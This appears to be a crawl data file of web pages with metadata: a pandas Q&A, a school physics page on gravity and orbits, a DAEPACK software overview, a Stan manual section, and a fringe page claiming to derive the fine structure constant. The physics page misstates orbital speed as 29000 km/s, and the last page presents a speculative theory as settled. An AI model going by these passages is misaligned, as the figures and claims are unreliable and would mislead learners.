{"ft_lang_label":"__label__en","ft_lang_prob":0.8082892,"math_prob":0.99993265,"size":1918,"snap":"2021-43-2021-49","text_gpt3_token_len":706,"char_repetition_ratio":0.18652038,"word_repetition_ratio":0.34567901,"special_character_ratio":0.4337852,"punctuation_ratio":0.11883408,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9999914,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,5,null,3,null,3,null,3,null,5,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-16T18:24:21Z\",\"WARC-Record-ID\":\"<urn:uuid:a7b035a3-f995-47a6-a84a-6a3766c1d289>\",\"Content-Length\":\"111696\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eeeac214-509a-4d57-9a1a-af07cb180a5c>\",\"WARC-Concurrent-To\":\"<urn:uuid:5ac3696d-523a-46ea-b408-4a413df04dc7>\",\"WARC-IP-Address\":\"172.67.209.153\",\"WARC-Target-URI\":\"https://scienceplusplus.com/graph-fx-to-fx-%C2%B1-a/\",\"WARC-Payload-Digest\":\"sha1:SHO3SQ5LFAKPOXC4NEESOMVNACHKSVX7\",\"WARC-Block-Digest\":\"sha1:I54KZV7XZSYVXTVWEGENLAASTPGSQPUF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323584913.24_warc_CC-MAIN-20211016170013-20211016200013-00474.warc.gz\"}"}
https://stackoverflow.com/questions/45229159/easy-way-to-distinguish-between-0-and-false-in-a-dataframe-with-mixed-values
[ "# Easy way to distinguish between 0 and False in a dataframe with mixed values\n\nI have a column in my dataframe where the values take on either 1, 0, False but the rows with False or O are functionally different.\n\nI would therefore like to convert either the False or 0 values to something else\n\nWhat would be an good way to do this?\n\nUsing replace has not worked well\n\ndf[\"col_name\"] = df[\"col_name\"].replace(0,2) converts the False values too\n\nand\n\ndf[\"col_name\"] = df[\"col_name\"].replace(False,2) converts the 0 values too\n\n## 4 Answers\n\nYou can use mask to replace values with a boolean mask - the advantage of this solution is no original types are changed:\n\ndf = pd.DataFrame({'Col':[1, False, 0]})\n\ndf['Col'] = df['Col'].mask(df['Col'].astype(str) == '0', 2).replace(False, 3)\nprint (df)\nCol\n0 1\n1 3\n2 2\n\n\nSolution with Series.replace by dict, but first converting to str by astype works too, but generally it convert all values to str what with real data can be problem.\n\nd = {'0':'Zero', 'False':False}\ndf = df['Col'].astype(str).replace(d)\nprint (df)\n0 1\n1 False\n2 Zero\nName: Col, dtype: object\n\n\nI try create more general solution with map and checking bools by isinstance:\n\ndf = pd.DataFrame({'Col':[1, False, 0, True,5]})\nprint (df)\nCol\n0 1\n1 False\n2 0\n3 True\n4 5\n\nm = df['Col'].apply(lambda x: isinstance(x, bool))\ndf['Col'] = df['Col'].mask(m, df['Col'].map({False:2, True:3}))\n\nprint (df)\nCol\n0 1\n1 2\n2 0\n3 3\n4 5\n\n\nYou can convert to str type and then use df.str.replace:\n\nIn : df = pd.DataFrame({'Col':[1, False, 0]})\n\nIn : df.Col.astype(str).replace('0', 'Zero').replace('False', np.nan)\nOut:\n0 1\n1 NaN\n2 Zero\n\n\nLet's use astype:\n\ndf = pd.DataFrame({'Datavalue':[1,False,0]})\n\ndf.Datavalue.astype(str) == \"0\"\n\n\nOutput:\n\n0 False\n1 False\n2 True\nName: Datavalue, dtype: bool\n\ndf.loc[df.Datavalue.astype(str) == \"0\",'Datavalue'] = \"Zero\"\n\n\nOutput:\n\n Datavalue\n0 1\n1 False\n2 Zero\n\n\nUse jezrael's dataframe df\n\ndf = pd.DataFrame({'Col':[1, False, 0]})\n\n\nOption 1\nIf there are only three values, 1, 0, or False, then being of type bool is as good as being False\n\ndf.Col.mask(df.Col.apply(type) == bool, 2)\n\n0 1\n1 2\n2 0\nName: Col, dtype: object\n\n\nOption 2\nYou can use the python is operator\n\nFalse is 0\n\nFalse\n\n\nAnd use mask as we had before\n\ndf.mask(df.Col.apply(lambda x: x is False), 2)\n\n0 1\n1 2\n2 0\nName: Col, dtype: object\n\n• Then that throws it off. However, if OP is correct and only 3 values, then this works. – piRSquared Jul 21 '17 at 6:05" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74187,"math_prob":0.98362225,"size":438,"snap":"2021-21-2021-25","text_gpt3_token_len":121,"char_repetition_ratio":0.16129032,"word_repetition_ratio":0.0,"special_character_ratio":0.25570777,"punctuation_ratio":0.09090909,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99768513,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-20T02:19:56Z\",\"WARC-Record-ID\":\"<urn:uuid:1cd8ec99-8d70-416a-bcc6-c4d679f39a87>\",\"Content-Length\":\"191678\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7193f205-b008-40d7-babc-afbe1875b8c6>\",\"WARC-Concurrent-To\":\"<urn:uuid:0359afbf-a73f-476a-9f67-63772194791c>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://stackoverflow.com/questions/45229159/easy-way-to-distinguish-between-0-and-false-in-a-dataframe-with-mixed-values\",\"WARC-Payload-Digest\":\"sha1:52NFVXHH4OZKVLCIBJEXR3XDOZK4235N\",\"WARC-Block-Digest\":\"sha1:35SUO3WKHDA2HVQXAWSEECYM4YNPUU2B\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487653461.74_warc_CC-MAIN-20210619233720-20210620023720-00606.warc.gz\"}"}
https://www.karnatakaeducation.org.in/KOER/en/index.php?title=Acceleration_due_to_Gravity&diff=prev&oldid=7187
[ "# Concept Map\n\nError: Mind Map file `Acceleration_due_to_gravity.mm` not found\n\n# Textbook\n\n## Useful websites\n\n1. The Value of \"g\". This is a good resource to study the variation of “g” at various distances above the Earth's atmosphere.\n2. This article examines the Galileo experiment and discusses if there are other possible explanations.\n\n# Teaching Outlines\n\n1. Gravitational force due to the Earth produces an acceleration in the objects. This is the force acting on a freely falling object.\n2. The value of acceleration is not dependent on the mass.\n3. All freely falling bodies gain same acceleration.\n\n## Concept #1 - Gravitational force due to the Earth produces an acceleration\n\n### Learning objectives\n\n1. To understand what causes an object to fall - the force and the acceleration\n2. Calculating the value of \"g\"\n\n### Notes for teachers\n\nThese are short notes that the teacher wants to share about the concept, any locally relevant information, specific instructions on what kind of methodology used and common misconceptions/mistakes.\n\n# Acceleration due to gravity\n\n### Free fall and acceleration due to gravity\n\nA freely falling body undergoes acceleration. This acceleration is caused by the gravitational force exerted by the larger mass of the Earth. This is referred to as acceleration due to gravity. The Earth also undergoes an acceleration due to the gravitational force exerted by the object. We do not notice it because of the mass of the Earth.\n\n### Activity No #1 - Freely falling Object\n\n• Estimated Time\n• Materials/ Resources needed\n• Prerequisites/Instructions, if any\n• Multimedia resources\n• Process (How to do the activity)\n• Developmental Questions (What discussion questions)\n• Evaluation (Questions for assessment of the child)\n• Question Corner\n\n### Activity No #2 – Observe a freely falling body\n\n• Estimated Time - 30 minutes\n• Materials/ Resources needed\n• Prerequisites/Instructions, if any\n1. Good quality clock with high precision of measurement\n2. This experiment will be difficult to measure\n• Multimedia resources\n• Process (How to do the activity)\n1. Ask a child to drop a piece of chalk from terrace\n2. Start the stop clock as soon as the child drops it.\n3. Put off the clock as soon as the chalk touches the ground, note down the time taken\n4. Repeat the same expt with a stone,& calculate the time\n• Developmental Questions (What discussion questions)\n1. What was the time taken?\n2. Was it the same?\n3. Why would it be so?\n4. Do the students relate it to the equations of motion they have studied?\n\nEvaluation (Questions for assessment of the child)\n\n• Question Corner\n\n## Concept #\n\n### Notes for teachers\n\nThese are short notes that the teacher wants to share about the concept, any locally relevant information, specific instructions on what kind of methodology used and common misconceptions/mistakes.\n\n### Activity No #\n\n• Estimated Time\n• Materials/ Resources needed\n• Prerequisites/Instructions, if any\n• Multimedia resources\n• Process (How to do the activity)\n• Developmental Questions (What discussion questions)\n• Evaluation (Questions for assessment of the child)\n• Question Corner\n\n### Activity No #\n\n• Estimated Time\n• Materials/ Resources needed\n• Prerequisites/Instructions, if any\n• Multimedia resources\n• Process (How to do the activity)\n• Developmental Questions (What discussion questions)\n• Evaluation (Questions for assessment of the child)\n• Question Corner\n\n# Fun corner\n\nUsage\n\nCreate a new page and type {{subst:Science-Content}} to use this template\n\n# Weight\n\n## Concept flow\n\n• Every particle has mass; weight is a force acting on a mass due to the gravitational pull.\n• This force experienced by an object due to the gravitational pull of the Earth is what we call the weight. Weight is nothing but the force exerted on a mass due to the gravitational pull of the Earth.\n\n### How do we perceive this weight?\n\nWhen you stand on a surface, the force of the Earth's gravity is acting upon you downwards and there is a normal force exerted by the surface on which you stand. Since you stand on a firm surface and there is no acceleration, the normal force is equal to the gravitational force and this is equal to mg. If an object is suspended from a spring, the gravitational force will be balanced by the tension force in the string.\n\nWeight is that supporting force felt by an object in equilibrium; this opposes and balances the gravitational pull of the Earth. Thus, humans experience their own body weight as a result of this supporting force, which results in a normal force applied to a person by the surface of a supporting object, on which the person is standing or sitting. In the absence of this force, a person would be in free-fall, and would experience weightlessness. It is the transmission of this reaction force through the human body, and the resultant compression and tension of the body's tissues, that results in the sensation of weight.\n\nWhen an object is in equilibrium, it only experiences the gravitational and restoring force/ Weight is mass multiplied by the acceleration due t gravity\n\nMeasured weight can change:\n\n• when acceleration due to gravity changes\n• when the object is accelerating (non-inertial frame)\n\nWhen used to mean force, magnitude of weight (a scalar quantity), often denoted by an italic letter W, is the product of the mass, m, of the object and the magnitude of the local gravitational acceleration g;. thus: W = mg. When considered a vector, weight is often denoted by a bold letter W. The unit of measurement for weight is that of force, which in the International System of Units (SI) is the newton.\n\nFor example, an object with a mass of one kilogram has a weight of about 9.8 newtons on the surface of the Earth, about one-sixth as much on the Moon, and very nearly zero when in deep space far away from all bodies imparting gravitational influence.\n\nEarlier concepts of weight\n\nConcepts of heaviness (weight) and lightness (levity) date back to the ancient Greek philosophers. These were typically viewed as inherent properties of objects. Plato described weight as the natural tendency of objects to seek their kin. To Aristotle weight and levity represented the tendency to restore the natural order of the basic elements: air, earth, fire and water. He ascribed absolute weight to earth and absolute levity to fire. Archimedes saw weight as a quality opposed to buoyancy, with the conflict between the two determining if an object sinks or floats. The first operational definition of weight was given by Euclid, who defined weight as: \"weight is the heaviness or lightness of one thing, compared to another, as measured by a balance.\". Satellites and weightlessness\n\nIt is a very common misconception that when astronauts are in orbit they are weightless because they are somehow far enough from the earth that the force of earth's gravity does not pull on them. This is totally incorrect. If they were that far away, earth's gravity would not pull on the shuttle either and it would be impossible for it to be in orbit around the earth.\n\nGravity (a force we call weight) is actually responsible for keeping the space craft and the astronaut in orbit around the earth. Gravity is still pulling on the astronaut. The feeling of weight;ess is no differenet than when in ree fall. What they are not experiencing is the normal force, which is the opposing force. When that force is gone, we feel say we feel \"weightless.\" In fact, whenever a person is in freefall they feel weightless even though gravity is still causing them to have weight. While in orbit, the space shuttle does not have to push on the astronaut (or anything else in the cabin) to keep him up. The space shuttle and the astronaut are in a constant state of freefall around the earth.\n\n# Significance of the gravitational force\n\n## Discovery of planets\n\nAccurate measurements on the orbits of the plantes indicated that they did not precisely follow Kepler's laws. Slight deviations from perfectly elliptical orbits were observed. Newton was aware that this was to be expected from the Law of Universal Gravitation. The derivation of perfectly elliptical ignores the forces due to the other planets. These deviations called perturbations are observed and led to the discovery of Neptune and Pluto. Planets around distant stars were also inferred from the regular wobble of each star due to the gravitational attraction of the revolving plant.\n\n## Ocean tides\n\nOcean tides are caused by differences in the gravitational pull between the Moon and the Earth on the opposite sides of the Earth. Gravitational force is stronger on the side of the Earth nearer to the Moon and is weaker on the side of the Earth farther from the Moon. The bulge that is caused in the Earth's oceans due to this gravitational pull results in two sets of tides on the Earth.\n\n### Activity 3 : Thought Experiment\n\nObjective: To understand the nature of gravitational force\n\nProcedure:\n\nAsk the children to think about what will happen if we had a hollow tunnel running through the centre of the Earth and we dropped a ball into it. What will happen to the ball?\n\n# Projectile and Satellite Motion\n\n## Concept flow\n\n• A projectile motion of a body thrown is due to the gravitational force.\n• Satellites are projectiles that are continuously falling in the orbit around planets\n\nLet us study this picture below and analyze what happens in each of the cases.\n\nIn the first case, the ball is just dropped from the cliff and it falls down in a straight line, subject to the force of gravity. In the second and third instances, the ball is thrown upwards, reaches a certain height and still falls down. In the third case, the ball covers a horizontal range as well.\n\nIn all these cases, gravity is the only force acting. Without gravity, we could throw a rock upwards at an angle and it follow a straight line path. Because of gravity, however, the path curves.\n\nSuch an object, when thrown/ projected and continues its motion on its own inertia is called a projectile. A projectile will have two components to ots velocity – the horizontal and the vertical. The horizontal component is similar to an object rolling on a plane/ along a straight line. The vertical component of the velocity is subject to the acceleration due to gravity. A projectile moves horizontally as it moves downwards or upwards.\n\nImagine throwing a ball straight up. It will fall down to the same place. In this case the ball has a velocity in the vertical direction which changes with time as the force due to gravity causes an acceleration in the downward direction all the time. But suppose on were to throw a ball with only a horizontal velocity. The ball will now move with a velocity that has two components to it - one the horizontal velocity which remains unchanged as long as there is no force such as air resistance acting on it and a vertical velocity that is continually changing. This vertical velocity starts at zero - we threw the ball horizontally - and keeps increasing with an acceleration g.\n\nThe resultant velocity is a combination of the two. This is what causes objects to follow a parabolic path when they are thrown with a combination of horizontal and vertical velocities. The greater the horizontal component the farther the ball will travel. For short distances, and small velocities, the curvature of the Earth will make no difference. But suppose that we throw it so hard that the horizontal distance is very large and we can no longer ignore the curvature of the Earth?\n\nSuppose we throw it so hard that that ball will continue to fall but will never reach the ground - the curvature of the fall of the ball is greater than the curvature of the Earth? Then the ball will become a satellite! It will move round and round the Earth - constantly falling but never reaching the ground!\n\nThe satellite and everything in it are constantly falling towards the Earth but will never reach it. Since they are all falling with the same velocity, the satellite does not exert any force on the objects or people inside. The people inside, therefore feel weightless. remember we have a sense of weight because of the Normal force. Here the Normal force is zero and so we feel weightless.\n\nThis is very similar to the sense of loss of weight in a lift that is accelerating downwards - except that here the acceleration is the acceleration due to gravity.\n\n## Satellite\n\nAn Earth satellite is simply a projectile that falls around the Earth rather than into it. That means the horizontal falling distance matches the Earths curvature. Geometrically, the curvature of the surface is that its surface drops a vertical distance of 5 metres for every 8000 metres tangent to the surface.\n\nTherefore, if we throw a rock or a ball at a high enough speed (about 29000 km/s), it would follow the curvature of the Earth. But at this speed, atmospheric friction (due to air drag) would burn up everything. This is why satellites are launched at an altitude high enough for the air drag to be negligible.\n\nSatellite motion was understood by Newton who reasoned that the Moon was simply a projectile that was circling the Earth.\n\n### Activity 4 - Demonstration of satellite motion using simulation\n\nThe following simulation can illustrate how satellite motion takes place.\n\n# Kepler's Laws\n\n## Concept flow\n\n• The key concept to understand here is that gravitational forces play an important role in planetary motion.\n• Three laws of planetary motion that describe the motion of the planets have been postulated based on detailed astronomical observations\n\n## Laws of Planetary Motion\n\nWe now know that satellites are continually falling towards the Earth following a curved path whose curvature is greater than that of the curvature of the Earth. The Moon is just such a satellite that moves around the Earth. In a similar way, all the planets that move around the Sun are satellites of the Sun. The motion described in such a situation is not strictly circular - it is elliptical.\n\nJohannes Kepler, working with data painstakingly collected by Tycho Brahe without the aid of a telescope, developed three laws which described the motion of the planets across the sky.\n\n1. The Law of Orbits: All planets move in elliptical orbits, with the sun at one focus.\n\n2. The Law of Areas: Each planet moves so that an imaginary line drawn from the Sun to the planet sweeps out equal areas in equal periods of time.\n\n3. The Law of Periods: The square of the period of any planet is proportional to the cube of the semimajor axis of its orbit.\n\nKepler's laws were derived for orbits around the sun, but they apply to satellite orbits as well.\n\n### The Law of Orbits\n\nAll planets move in elliptical orbits, with the sun at one focus. An ellipse is a closed curve such that the sum of the distances from any point P on the curve to two fixed points (called the foci, F1 and F2) remains constant.\n\nOrbit eccentricity\n\nThe semi major axis of the ellipse is a and represents the planet's average distance from the Sun. The eccentricity, “e” is defined so that “ea” is the distance from the centre to either focus. A circle is a special case of an ellipse where the two foci coincide. The Earth and most of the other planets have nearly circular orbits. For Earth, “e” = 0.017.\n\n### The Law of Equal Areas\n\nKepler's second law states that each planet moves so that an imaginary line drawn from the Sun to the planet sweeps out equal areas in equal periods of time.\n\nThis can be shown to be true using the law of conservation of angular momentum.\n\nIf “v” is the velocity of the planet, in time “dt” the planet moves a distance vdt and sweeps out an area equal to the area of a triangle of base “r” and altitude vdt sinα.\n\nHence dA = ½ (r) (“v” x “dt” x sinα)\n\ndA/ dt = ½ rv sinα\n\nThe magnitude of the angular momentum of the planet about the Sun is L = mvr sinα.\n\ndA/ dt = (½)L/m\n\nBecause the angular momentum is conserved, the rate of change of area covered is constant. This means that the planets move with different velocities depending upon their position in the orbits.\n\n### The Law of Periods\n\nThe ratio of the squares of the periods of any two planets revolving about the Sun is equal to the ratio of the cubes of their semi-major axes.\n\nCan you derive this?\n\nG m1 Ms / r12 = m1 (v12)/ r1\n\nv1 = 2πr1/T1\n\nSubstituting and rearranging we get\n\nT12/ r13 = 4π2 / G Ms\n\nDeriving this for another planet, we can arrive at the third law.\n\n5. www.hyperphysics.com - From Classical Mechanics to General Relativity - This is a good description of the geometry of Newtonian gravity and how to move from classical mechanics to relativity.\n\n8. http://www.physicsclassroom.com/Class/circles/U6L4b.cfm -This website describes the mathematics of orbital motion.\n\n# Keywords\n\nMass, Inertial, Gravitational, Force field, Universal law of gravitation, Acceleration due to gravity, “g”, weight, weightlessness" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9164175,"math_prob":0.9033593,"size":18329,"snap":"2023-14-2023-23","text_gpt3_token_len":3938,"char_repetition_ratio":0.1458663,"word_repetition_ratio":0.11269473,"special_character_ratio":0.20792188,"punctuation_ratio":0.097473994,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9797689,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-01T11:26:55Z\",\"WARC-Record-ID\":\"<urn:uuid:7d2e780d-61dc-400f-b065-30e8c661c2ae>\",\"Content-Length\":\"72863\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c3ebf4b8-8355-4906-b5cd-bf173bd8b0fa>\",\"WARC-Concurrent-To\":\"<urn:uuid:a5a5c06b-88b3-4339-87bc-2dec67078129>\",\"WARC-IP-Address\":\"43.254.42.216\",\"WARC-Target-URI\":\"https://www.karnatakaeducation.org.in/KOER/en/index.php?title=Acceleration_due_to_Gravity&diff=prev&oldid=7187\",\"WARC-Payload-Digest\":\"sha1:J7CMCZT2P3BYJ47HVGJTUGPGY3OW4LKQ\",\"WARC-Block-Digest\":\"sha1:6BDY5NEMSK6PQPT27QP4HS65P3ZZ4RKY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224647810.28_warc_CC-MAIN-20230601110845-20230601140845-00736.warc.gz\"}"}
http://yoric.mit.edu/DAEPACK/Overview
[ "# Overview\n\nDAEPACK is a software library consisting of components for performing symbolic and numeric computations on general Fortran-90 models.\n\nDAEPACK is an acronym for Differential-Algebraic Equation Package, however, its scope is not limited to the analysis of DAEs. The components of DAEPACK can be used by the modeler to provide the necessary information (e.g., sparsity pattern, analytical derivatives, hidden discontinuities, etc.) required when using state-of-the-art algorithms to solve a wide variety of numerical calculations, including the solution of nonlinear algebraic equations, mixed integer nonlinear optimization, parameter estimation, and many others. DAEPACK components are designed to be mixed, matched, and combined with third party numerical components to solve any particular problem at hand. What distinguishes DAEPACK from other numerical libraries (e.g., LINPACK or ODEPACK) is the set of symbolic components that automatically generate the information required to perform the numerical calculation efficiently, robustly, and correctly using state-of-the-art numerical algorithms. This information, which would otherwise have to be provided by the modeler (a very tedious, time consuming, and error prone task), is exploited in a suite of DAEPACK numeric components.\n\nDAEPACK can be used in several different ways. First, DAEPACK can be used standalone, where the modeler assembles the required symbolic and numeric components of DAEPACK, combined with the original model and other numerical routines, and solves a particular problem. The figure below demonstrates how DAEPACK can be used to assist the modeler in performing a dynamic calculation involving a DAE model.", null, "The user provides DAEPACK with a set FORTRAN files containing the model equations. This model is translated and a set of new FORTRAN files are generated, providing the sparsity pattern, analytical derivatives, and a discontinuity-locked version of the the original model. The sparsity pattern can be used with a variety of structural algorithms, providing valuable information about the model. For example, the DAE can be examined to determine if it is high index. Current work involves the development of algorithms for the automatic index reduction of general FORTRAN models. The code generated by the symbolic components are used by a variety of DAEPACK numerical components used in this example. For example, the sparsity pattern and analytical derivatives are used by the block solver component to obtain a consistent set of initial conditions. The block solver, described in the numeric components section of the Features page, often dramatically improves the performance of the consistent initial condition calculation. The sparsity pattern, analytical derivatives, and discontinuity-locked model are used by a set of dynamic calculation components to perform the desired numerical calculation.\n\nDAEPACK is also used with the equation-oriented process simulator ABACUSS II. The figure below contains a diagram showing the architecture of ABACUSS II.", null, "ABACUSS II uses DAEPACK to perform the required numerical calculations. In addition,DAEPACK is used to properly incorporate FORTRAN code, such as physical property subroutines and legacy models, into an overall model. FORTRAN code is no longer treated as ablack box -- DAEPACK is used to generate all of the symbolic information so that these external models are treated exactly the same way as the part of the model written in ABACUSS II's input language. This capability allows the modeler to formulate heterogeneous models, where different parts of the model are expressed in various forms using the appropriate language for a particular task.\n\nA third use of DAEPACK is as an enabling technology for CAPE-OPEN components. The EU-sponsored CAPE-OPEN committee and subsequent Global CAPE-OPEN committee are defining important interface standards for process simulation tools that will greatly improve the flexibility of modern simulation environments. The vision is that tools (e.g., physical property routines, process unit operation models, numerical routines, etc.) written in-house and combined with the products of several third-party vendors can be combined seamlessly to perform the desired calculation. The disadvantage of this, however, is that it forces the modeler developing CAPE-OPEN compliant components to concentrate on issues other than writing a correct model. This is particularly true of the Equation-Set Object which encapsulates\n\nthe variables, equations, and other information required when performing dynamic calculations within the CAPE-OPEN framework. The current specification requires the modeler to provide access to the equation structure (dimensions and sparsity pattern), partial derivatives, and variable values. If the system involves discontinuities then the modeler must represent the discontinuous model equations as a State-Transition Network. This, in particular, can be quite problematic since the number of discrete modes may become extremely large even for small problems. Fulfillment of these requirements places a tremendous burden on the modeler. Fortunately, DAEPACK can be used to automatically generate the additional information required to satisfy the CAPE-OPEN specifications. As shown in the figure below, the modeler concentrates on writing a correct model and DAEPACK takes care of the rest.", null, "The CAPE-OPEN committee is defining important interface standards that will greatly increase the flexibility of modern process modeling environments, however, without enabling technologies, such as DAEPACK, these endeavors will never reach their true potential.\n\n#### Heterogeneous model formulation\n\nThe input translation step of DAEPACK was designed from the start to be a flexible as possible, readily extensible to translating models described using languages other than Fortran-90. This capability, within the equation-oriented framework described above, allows the modeler to be very flexible in the model representation. The best model representation can be selected for different portions of the model and, using DAEPACK, the overall model can be solved in a consistent, correct manner." ]
[ null, "http://yoric.mit.edu/sites/default/files/images/daepack.inline.gif", null, "http://yoric.mit.edu/sites/default/files/images/abacussII.inline.gif", null, "http://yoric.mit.edu/sites/default/files/images/eso.inline.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8893131,"math_prob":0.91886485,"size":6176,"snap":"2019-51-2020-05","text_gpt3_token_len":1160,"char_repetition_ratio":0.14063513,"word_repetition_ratio":0.0045095826,"special_character_ratio":0.16839378,"punctuation_ratio":0.10516066,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95636994,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-15T07:21:25Z\",\"WARC-Record-ID\":\"<urn:uuid:88f1337d-7d99-4c45-b91c-f52e1866af80>\",\"Content-Length\":\"35837\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:16cdf8f3-6676-4127-b511-712944c9dcee>\",\"WARC-Concurrent-To\":\"<urn:uuid:a2f12d44-31f0-4d50-8893-ae75bed409c8>\",\"WARC-IP-Address\":\"18.9.61.41\",\"WARC-Target-URI\":\"http://yoric.mit.edu/DAEPACK/Overview\",\"WARC-Payload-Digest\":\"sha1:QK4YVDS6KMGH5UBA567HAQAR3NSF6TC5\",\"WARC-Block-Digest\":\"sha1:3YCFITFSSEPZMNBTV7VFEY7ZUTOEFIZD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575541307797.77_warc_CC-MAIN-20191215070636-20191215094636-00383.warc.gz\"}"}
https://mc-stan.org/docs/2_18/stan-users-guide/functions-acting-as-random-number-generators.html
[ "## 17.4 Functions Acting as Random Number Generators\n\nA user-specified function can be declared to act as a (pseudo) random number generator (PRNG) by giving it a name that ends in _rng. Giving a function a name that ends in _rng allows it to access built-in functions and user-defined functions that end in _rng, which includes all the built-in PRNG functions. Only functions ending in _rng are able access the built-in PRNG functions. The use of functions ending in _rng must therefore be restricted to transformed data and generated quantities blocks like other PRNG functions; they may also be used in the bodies of other user-defined functions ending in _rng.\n\nFor example, the following function generates an $$N \\times K$$ data matrix, the first column of which is filled with 1 values for the intercept and the remaining entries of which have values drawn from a standard normal PRNG.\n\nmatrix predictors_rng(int N, int K) {\nmatrix[N, K] x;\nfor (n in 1:N) {\nx[n, 1] = 1.0; // intercept\nfor (k in 2:K)\nx[n, k] = normal_rng(0, 1);\n}\nreturn x;\n}\n\nThe following function defines a simulator for regression outcomes based on a data matrix x, coefficients beta, and noise scale sigma.\n\nvector regression_rng(vector beta, matrix x, real sigma) {\nvector[rows(x)] y;\nvector[rows(x)] mu;\nmu = x * beta;\nfor (n in 1:rows(x))\ny[n] = normal_rng(mu[n], sigma);\nreturn y;\n}\n\nThese might be used in a generated quantity block to simulate some fake data from a fitted regression model as follows.\n\nparameters {\nvector[K] beta;\nreal<lower=0> sigma;\n...\ngenerated quantities {\nmatrix[N_sim, K] x_sim;\nvector[N_sim] y_sim;\nx_sim = predictors_rng(N_sim, K);\ny_sim = regression_rng(beta, x_sim, sigma);\n}\n\nA more sophisticated simulation might fit a multivariate normal to the predictors x and use the resulting parameters to generate multivariate normal draws for x_sim." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.75336313,"math_prob":0.99102324,"size":1852,"snap":"2019-13-2019-22","text_gpt3_token_len":470,"char_repetition_ratio":0.121753246,"word_repetition_ratio":0.013157895,"special_character_ratio":0.2537797,"punctuation_ratio":0.13461539,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995678,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-26T09:30:17Z\",\"WARC-Record-ID\":\"<urn:uuid:090f3f53-ebca-40dc-a8b9-75c5d1263b67>\",\"Content-Length\":\"88349\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b30d20c7-4736-4060-89d2-eb61dbff316c>\",\"WARC-Concurrent-To\":\"<urn:uuid:2e24af22-3cf1-41e7-adeb-0957f4d14beb>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://mc-stan.org/docs/2_18/stan-users-guide/functions-acting-as-random-number-generators.html\",\"WARC-Payload-Digest\":\"sha1:TEID2IQJJK2VEBDMYHRSFDO57M7KPRQU\",\"WARC-Block-Digest\":\"sha1:46HA5ORBAEXJ4YGYSU4XTKVOZTVBXMGH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912204885.27_warc_CC-MAIN-20190326075019-20190326101019-00051.warc.gz\"}"}
http://www.ccaesar.com/eng_fine_structure_constant.html
[ "GER  |  ENG\nHOME", null, "STRUCTURE OF THE ELECTRON", null, "QUARK THEORY", null, "GRAVITY", null, "ARTICLES", null, "IMPRESSUM", null, "# Fine Structure Constant\n\nThe fine structure - or coupling - constant is one of the biggest mysteries of physics of the last decades.\n\nThe current descriptions and explanations (according to the Wikipedia page on the subject and various findings and interpretations) are strictly empirical. There are at least seven possible physical interpretations on this wikipedia page for the physical meaning of the fine structure constant.\n\nThe approach of the circulating electromagnetic wave model of the electron on this website (submitted for publication) derives the simple formula for the fine structure constant with a clear physical concept.\n\nThe ratio of the field energy responsible for the charge to the total particle rest energy is the dimensionless figure 1/137, which is identical in value and formula to the fine structure or coupling constant.\n\nThe fraction 1/X of the field energy of the electron that forms the external charge to the total field energy", null, "can be calculated. The electron is regarded as sphere capacitor with the stored energy E = 1/2 Q2 /C.", null, ". With the capacity", null, ", the charge Q is", null, "With the values for the de Broglie frequency", null, ", the electron radius", null, "determined above and the factor 1/X = 1/137, the electron charge is calculated correctly to 1.603 10-19 C. The dimensionless fraction 1/X equals the fine structure constant", null, ".\n\nIf the known formula of", null, "is inserted into the above equation, the product inside the root equals to", null, "and Q = e. The coupling constant", null, "perfectly confirms the current model.\n\nAbove approach is regarded the quantum realistic origin and meaning of the coupling - or fine structure constant as the ratio of the electric field energy forming the charge of the electron to the total field energy", null, ".\nThe most recent elaborated papers submitted for publication see this page on the right side on the electron or on the quark.\n\nThis physical approach for the origin of the fine structure constant is simple and gives a definition that does not rely on the interaction between a photon and the electron.\n\nFrom the spin the electric charge and the electron radius can be calculated.\n\nsee the page on the 